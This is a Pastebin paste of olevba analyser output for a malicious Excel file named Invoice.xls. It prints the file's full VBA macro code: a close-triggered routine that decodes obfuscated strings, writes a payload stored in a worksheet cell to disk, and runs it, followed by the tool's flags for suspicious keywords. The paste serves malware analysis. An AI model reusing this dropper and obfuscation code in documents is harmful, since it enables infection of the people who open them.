SHARE
TWEET

Malicious Excel macro

dynamoo Apr 8th, 2015 327 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:M-S---- Invoice.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_BeforeClose(Cancel As Boolean)
  16. hjgHGjkdg
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. No suspicious keyword or IOC found.
  21. -------------------------------------------------------------------------------
  22. VBA MACRO Ëèñò1.cls
  23. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. Option Explicit
  26.  
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. ANALYSIS:
  29. No suspicious keyword or IOC found.
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. Option Explicit
  35.  
  36. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  37. ANALYSIS:
  38. No suspicious keyword or IOC found.
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Ëèñò3.cls
  41. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Module1.bas
  46. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. Sub hjgHGjkdg()
  49. Dim PathToSave
  50. PathToSave = DecryptEPI("-exxhe|e-†“–kjj—£’8¦Ž£")
  51. Dim WshShell
  52. Set WshShell = CreateObject(DecryptEPI("{¢— ¤8{–‘šš"))
  53. PathToSave = WshShell.ExpandEnvironmentStrings(PathToSave)
  54. Set s = CreateObject(DecryptEPI("ehuhf8{¤¢‘›"))
  55. s.Mode = 3
  56. s.Type = 2
  57. s.Open
  58. s.WriteText Worksheets(DecryptEPI("’™")).Range(DecryptEPI("h><")).Value
  59. Call s.SaveToFile(PathToSave, 2)
  60. WshShell.Run PathToSave
  61. End Sub
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+--------------+-----------------------------------------+
  71. | Type       | Keyword      | Description                             |
  72. +------------+--------------+-----------------------------------------+
  73. | Suspicious | CreateObject | May create an OLE object                |
  74. | Suspicious | WriteText    | May create a text file                  |
  75. | Suspicious | SaveToFile   | May create a text file                  |
  76. | Suspicious | Open         | May open a file                         |
  77. | Suspicious | Run          | May run an executable file or a system  |
  78. |            |              | command                                 |
  79. +------------+--------------+-----------------------------------------+
  80. -------------------------------------------------------------------------------
  81. VBA MACRO Module2.bas
  82. in file: Invoice.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  84. Public Function DecryptEPI(sString As String) As String
  85.     Dim I As Integer
  86.     Dim sLen As Integer, sBuffer As String
  87.     sLen = Len(sString)
  88.     For I = 1 To sLen
  89.         sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
  90.     Next I
  91.     DecryptEPI = sBuffer
  92. End Function
  93.  
  94. Private Function Oct2Dec(Number As String) As Integer
  95.     Dim I As Integer
  96.     Dim sLen As String, sBuffer As Integer, iNumb As Integer
  97.     sLen = Len(Number)
  98.     For I = 0 To sLen
  99.         iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
  100.         sBuffer = sBuffer + ((8 ^ I) * iNumb)
  101.     Next I
  102.     Oct2Dec = sBuffer
  103. End Function
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+------------+-----------------------------------------+
  108. | Type       | Keyword    | Description                             |
  109. +------------+------------+-----------------------------------------+
  110. | Suspicious | Chr        | May attempt to obfuscate specific       |
  111. |            |            | strings                                 |
  112. | Suspicious | StrReverse | May attempt to obfuscate specific       |
  113. |            |            | strings                                 |
  114. +------------+------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top